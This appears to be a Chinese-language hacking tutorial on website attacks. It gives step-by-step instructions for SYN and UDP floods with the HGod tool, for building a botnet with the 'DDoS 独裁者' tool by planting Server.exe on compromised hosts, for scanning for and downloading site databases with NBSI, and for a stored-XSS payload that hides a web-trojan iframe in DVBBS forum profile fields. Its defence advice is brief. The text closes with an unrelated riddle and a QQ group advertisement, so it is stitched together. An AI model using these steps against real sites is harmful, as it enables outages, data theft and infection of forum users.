一、网站基础知识

（一）网站攻击的原理和特点

网站攻击的手段多种多样，其基本原理是：网站攻击者利用网站服务器操作系统自身存在的或因配置不当而产生的安全漏洞、网站编写所使用语言程序本身所具有的安全隐患等，然后通过网站攻击命令、从网上下载的专用软件或自己编写的攻击软件非法进入网站服务器系统，从而获得网站服务器的管理权限，进而非法修改、删除网站系统中的重要信息或在网站服务器的系统中添加垃圾、色情和有害信息（如特洛伊木马）等。

网站攻击主要有以下几个特点。

⑴广泛性：目前，由于网络上各种各样的网站数不胜数，因此给网站攻击者提供了众多的攻击目标，可以说，有网站的地方就有网站攻击的存在，应用比较广泛。

⑵多样性：网站攻击的手段多种多样，主要是因为网站服务器各不相同，且使用的网站编程程序也不尽相同，不同的网站服务器和网站程序都有可能存在着不同的漏洞，因此使得网站的攻击手段极为多样。

⑶危害性：网站攻击的危害性极大，轻者导致网站服务器无法正常运行，重者可以盗取网站用户中的重要信息，造成整个网站的瘫痪，甚至还可以控制整个网站服务器。

⑷难于防范性：对于网站的攻击很难防范，因为每个网站所采用的网站编程程序不尽相同，所产生的漏洞也不相同，很难采用统一的方式为漏洞打补丁。另外，网站的攻击不会在防火墙或系统日志中留下任何入侵痕迹，致使网络管理员也很难从网站日志里查找到入侵者的足迹。

（二）网站的维护与安全

网站的安全的基础是系统及平台的安全，只有在做好系统平台的安全工作后才能保证网站的安全。目前，随着网站数量的增多，以及编写网站代码的程序语言也在不断的更新，致使网站漏洞不断出新，黑客攻击手段不断变化，让用户防不胜防，但用户可以以不变应万变，从如下几个方面来防范网站的安全。

1、网站服务空间是租用的

针对这种情况，网站管理员只能在保护网站的安全方面下功夫，即在网站开发这块做一些安全的工作。

⑴ 网站数据库的安全。

⑵ 堵住数据库下载漏洞，换句话说就是不让别人下载数据库文件，并且数据库文件的命名最好复杂并隐藏起来，让别人认不出来。

⑶ 网站中最好不要有上传和论坛程序。因为这样最容易产生上传文件漏洞以及其他的网站漏洞。 

⑷ 后台管理程序，对于后台管理程序的要求是：首先不要在网页上显示后台管理程序的入口链接，防止黑客攻击，其次就是用户名和密码不能过于简单且定期更换。

⑸ 定期检查网站上的木马，使用某些专门木马查杀工具，或使用网站程序集成的监测工具定期检查网站上是否存在有木马。除以上外，还可以把网站上的文件除了数据库文件外，都改成只读的属性，以防止文件被篡改。

2、网站服务空间是自己的

针对这种情况，除了采用上述几点对网站安全进行防范外，还要对网站服务器的安全进行防范。这里以Windows+IIS实现的平台为例，需要做到如下几点。

⑴ 服务器的文件存储系统要使用NTFS文件系统，因为在对文件和目录进行管理方面，NTFS系统更安全有效；

⑵ 关闭默认的共享文件；建立相应的权限机制，让权限分配以最小化权限的原则分配给Web服务器访问者；

⑶ 删除不必要的虚拟目录、危险的IIS组件和不必要的应用程序映射。

⑷要保护好日志文件的安全，因为，日志文件是系统安全策略的一个重要环节，可以通过对日记的查看，及时发现并解决问题，确保日志文件的安全能有效提高系统整体安全性。

（三）网站的常见攻击方式

网站攻击的手段极其多样，但是黑客常用的网站攻击手段主要有如下几种。

1. 阻塞攻击

2. 文件上传漏洞攻击

3. 跨站脚本攻击

4. 弱密码的入侵攻击

5. 网站旁注入侵

6. 其他脚本攻击

二、Dos攻击

（一）认识Dos攻击

最常见的Dos攻击有计算机网络带宽攻击和连通性攻击。带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。

而连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求。常见有以下几种。

⑴ 试图FLOOD服务器，阻止合法的网络通讯。

⑵ 破坏两个机器间的连接，阻止访问服务。

⑶ 阻止特殊用户访问服务。

⑷ 破坏服务器的服务或者导致服务器死机。

不过，只有那些比较阴险的攻击者才单独使用Dos攻击，破坏服务器。通常，Dos攻击会被作为一次入侵的一部分，如绕过入侵检测系统时，通常从用大量的攻击出发，导致入侵检测系统日志过多或者反应迟钝，入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

Dos攻击是指攻击者通过消耗受害网络的带宽，消耗受害主机的系统资源，发掘编程缺陷，提供虚假路由或DNS信息，使被攻击目标不能正常工作。实施Dos攻击的工具易得易用，而且效果明显。

（二）Dos攻击的原理

使用Dos攻击，实现对方服务器拒绝服务攻击，其原理有以下两点。

⑴迫使服务器的缓冲区爆满，不能在接收新的请求。

⑵使用IP欺骗，致使服务器把合法用户的连接复位，影响合法用户的链接。

（三）实现Dos攻击的方式

Dos攻击常用的手段是使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不负重荷而停止提供正常的网络服务。

实现Dos攻击的方法很多，但具体可分为如下几类。

1．Synflood

2．Smurf攻击

3．Land攻击

4．Ping of Death

5．泪滴（Teardrop）攻击

6．Ping洪流攻击（PingSweep）

7．Pingflood攻击

8．UDP洪水攻击

（四）使用工具进行Dos攻击

SYN攻击利器HGod

使用Hgod进行攻击的具体步骤如下。

➊ 在【命令提示符】窗口中输入“hgod /？”命令，即可得到hgod详细的使用信息。

➋ 再输入“hgod 192.168.0.45 25-80 m SYN”命令，运行该命令可攻击目标主机中从25号端口到80号之间的所有端口，其运行效果下图所示。

➌ 通过HGod也可以进行UDP洪水攻击，在【命令提示符】窗口中输入命令“hgod 192.168.0.45 50-80 m UDP”，即可攻击目标主机中50号端口到80号之间的所有UDP端口，其运行结果：

三、DDos攻击

（一）DDos攻击概述

DDos攻击手段是在传统的Dos攻击基础之上产生的一类攻击方式。单一的Dos攻击一般是采用一对一方式的，当被攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高，它的效果是明显的。随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得Dos攻击的困难程度加大了，目标对恶意攻击包的"消化能力"加强了不少，例如攻击软件每秒钟可以发送3，000个攻击包，但服务器与网络带宽每秒钟可以处理10，000个攻击包，这样一来攻击就不会产生什么效果。

此时，DDos攻击应运而生，使用多台电脑同时攻击服务器，往往能造成服务器瘫痪。

（二）实现DDos攻击的方式

目前网络上以分布式拒绝服务实施攻击较多，下面介绍几种常见的DDos攻击。

1．SYN变种攻击

2．TCP混乱数据包攻击

3．针对用UDP协议的攻击

4．针对Web Server的多连接攻击

5．针对Web Server的变种攻击

6．针对Web Server的变种攻击

7. 针对游戏服务器的攻击

（三）DDos攻击的一般步骤‍‍

1．搜集了解目标的情况

2．占领傀儡机

3．实际攻击

（四）使用工具进行DDos攻击

使用DDos独裁者进行攻击的具体操作步骤如下。

➊将“Server.exe”服务端程序放在傀儡机中执行，运行后的程序就会自动安装并重启计算机。重启后这台主机即可成为Autocrat服务端。

➋在本机中运行DDos独裁者客户端程序“Client.exe”，Client是控制Server的工具。

➌单击其中的【添加】按钮，即可打开【添加主机】对话框，在其中输入要添加的IP地址。

➍ 设置完毕后单击【确定】按钮，即可返回到【DDos独裁者客户端】主窗口。此时，在左上方主机列表中可看到添加的目标主机IP地址。

➎单击【扫描主机】按钮，即可打开【扫描DDos主机】对话框，在其中设置要扫描的IP地址范围。

➏单击【开始扫描】按钮，即可开始进行扫描，其扫描结果如下图所示。其中标记【成功】的IP地址，表示此主机已经安装了独裁者；标记为【失败】的IP地址，表示此主机没有安装服务器。

➐单击【DDos独裁者客户端】主窗口中的【检查状态】按钮，DDos独裁者客户端就会对IP列表进行检查，待检查完毕后就会生成一个扫描报告。单击【主机列表】栏目下方的【切换】按钮，切换到无效主机列表之后，再单击【清理主机】按钮，即可将无效的主机踢出去。

➑经过上述操作之后，在【攻击方式】栏目中单击相应按钮，就可以对目标主机实施攻击了。

四、SQL注入攻击

（一）SQL注入攻击概述

SQL注入的手法相当灵活，在注入时会碰到很多意外情况。是否能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

在IE浏览器窗口中，选择【工具】Ø【Internet选项】菜单项，即可打开【Internet选项】对话框。选择【高级】选项卡，选择【显示友好HTTP错误信息】复选框之后，单击【确定】按钮，即可完成设置。

在进行SQL注入攻击前，需要准备的工具如下。

1．SQL注入漏洞扫描器与漏洞利用工具

ASP环境的注入扫描器有“WIS+WED”、NBSI2、冰舞等，其中冰舞是一款针对ASP脚本网站的扫描工具。它结合扫描和注射为一体，能够很全面的寻找目标网站存在的漏洞。其主窗口如下图所示。

随着ASP注入的日益成熟，PHP+MYSQL注入也渐渐升温起来。同时也出现了比较好的工具，例如二娃和CASI，其主窗口分别如下图所示。

2. Web木马后门

Web木马后门时用于注入成功后，安装在网站服务器上用来控制一些特殊的木马后门。常见的Web木马后门有“冰狐浪子ASP木马，其客户端如下图所示。“海阳顶端网ASP木马”界面如图所示。另外，海阳顶端网ASP木马中还包含有ASP木马C/S模式转换器。

3. 注入辅助工具

在进行SQL注入攻击时，因为网站可能会采取一些防范措施，还需要使用一些辅助的工具，实现字符转换、格式转换等功能。常见的SQL注入辅助工具有“ASP木马C/S模式转换器”和“C2C注入格式转换器”等。

（二）SQL注入攻击的一般步骤

SQL注入攻击一般都经过发现SQL注入位置、判断后台数据库类型、确定XP_CMDSH ELL可执行情况、发现Web虚拟目录、上传ASP木马以及得到管理员权限等几个步骤。在本节将介绍详细介绍SQL注入攻击的过程。

1．SQL注入攻击网站的查找

2．判断数据库类型

3．确定CMDSHELL可执行情况

4．发现Web虚拟目录

5．上传ASP木马

6．得到管理员权限

（三）使用NBSI实现注入攻击

随着网络技术的不断发展，现在涌现出大量的专门对数据库文件进行探测的工具，如HDSI、NBSI、啊D SQL注入工具等，通过这些工具可以快速在网站的大量文件中找到需要的数据库文件路径。

这里以NBSI工具为例，其探测网站数据库文件路径的具体操作步骤如下：

➊ 下载并解压缩NBSI3.0文件后，双击其中的可执行文件图标，即可打开NBSI主窗口。

➋ 在NBSI主窗口中单击【扫描及工具】按钮右侧的下拉箭头，在弹出的快捷菜单中选择【Access数据库地址扫描】菜单项。在打开的设置界面中的【扫描地址】文本框中输入要扫描的远程网站地址或数据库文件夹名称。

➌ 单击【开始扫描】按钮，即可将mdb数据库文件的路径扫描出来。

➍ 将扫描出来的数据库路径进行复制，将该路径粘贴到IE浏览器的地址栏中，单击【转至】按钮，即可自动打开浏览器下载功能，即可将该数据下载到本地磁盘中，打开后结果如下图所示，这样，数据库的安全就可想而知了。

五、网站攻击的防御

DDos攻击的防御措施

DDos攻击是黑客最常用的攻击手段，下面列出了一些常规的预防方法。

⑴ 定期扫描。

⑵ 在骨干节点配置防火墙。

⑶ 用足够的机器承受黑客攻击。

⑷ 充分利用网络设备保护网络资源。

⑸ 过滤不必要的服务和端口。

⑹ 检查访问者的来源。

⑺ 过滤所有RFC1918 IP地址。

⑻ 限制SYN/ICMP流量。

此时用户还是可以采取如下几种措施来寻求一线希望。

⑴ 检查攻击来源

⑵ 找出攻击者所经过的路由，把攻击屏蔽掉

⑶ 在路由器上滤掉ICMP

六、分析网站漏洞

现在很多网站都存在着设计上的漏洞，如果网站管理员不及时从官方网站中下载相关漏洞补丁，入侵者将会利用这些存在的漏洞来攻击网站和服务器，这会给网站的安全运行带来极大的威胁。

利用动网DVBBS论坛的挂马漏洞，可以在不需要管理员权限的情况下，在论坛页面中嵌入网页木马，以攻击其他论坛用户。下面就来分析一下动网论坛产生挂马漏洞的原因。

具体的攻击步骤：

➊浏览器中打开动网论坛，若还没有在该论坛中注册一个用户，则单击【注册】按钮，即可打开【新用户注册】窗口进行注册。

➋用户注册页面中，根据提示输入注册信息，然后单击【提交】按钮，即可注册成功。

➌册会员的身份登录到动网论坛网站系统中，成功登录后的界面如下图所示。

➍ 在该页面中选择【用户控制面板】Ø【联系资料修改】菜单项，即可打开个人资料修改页面。

➎ 在【论坛密码】栏中输入论坛密码，在【主页地址】文本框中输入代码“<Script><Iframeheight=0 width=0 sRc=”http//网页木马地址”></ Iframe >”，使用这种方式挂的网页木马，由于网页框架是隐藏的，不容易被发现。

➏ 在【MSN号码】文本框中输入相应代码“<ScriptLanguage=JavaScript> var actioninfo3='单帖屏蔽'”。

➐ 设置完毕后，单击【更新】按钮，即可提交修改资料内容。如果提交成功，会在动网页面中看到“你修改的信息已成功提交”提示信息。

➑返回论坛中，回复或新发一篇帖子，帖子的内容可以随意填写。发表成功后再查看新发的帖子，即可看到在新发的帖子页面中已经嵌入了一个网页框架。

从上面攻击的过程中可以看出，网页木马是在“用户资料修改”页面中被挂上，这时使用记事本打开动网注册页面文件“reg.asp”，在其中可到如下的代码。

User IM=checkreal(Request.form("homepage")) &"| ||"& checkreal(Request.form("QQ")) &"| | |"&checkreal(Request.form("ICQ"))&"| | |"& checkreal(Request.form("msn")) &"| ||"& checkreal(Request.form("yahoo")) &"| ||"& checkreal(Request.form("aim")) &"| ||"& checkreal(Request.form("uc"))

其中“UserIM”是用于存储“TEXT（文本文件）”类型的主页、QQ、ICQ、msn等用户注册信息的。存储格式为“主页|||QQ|||ICQ|||msn|||yahoo|||aim|||uc”，其中“homepage”就是用户注册时的主页选项。程序通过调用“Request.form("homepage")”语句，从用户注册的From表单获得用户注册的主页数据，最终的用户输入数据是通过“checkreal”函数进行处理。在打开定义函数的“Fundon.asp” 文件中可以看到定义“checkreal”函数的代码，其具体内容如下：

Function checkreal(v)

Dim w

If not isnull(v) Then

w=replace(v，"| | |"，"§§§")    

checkreal=w

End If

End Function

由此可知，该函数仅是将“|||”进行了过滤，根本没有过滤<、>、/等特殊字符，所以就导致了用户可提交任何的恶意代码，这就是动网论坛中挂马漏洞产生的原因。

1992年大年三十晚上，一家人包好了2盖帘饺子放在那里，凌晨5时左右，起床准备煮饺子，发现2盖帘饺子全没有了，仅剩下2个空空的盖帘。屋里没有任何凌乱的迹象，并且门窗紧闭，一家人没敢声张，默默地和面、调馅儿重新包了饺子。请问饺子去哪里了？（答案分析请回复：jz） 

回复：微信群，可加微信群交流。

QQ群：16004488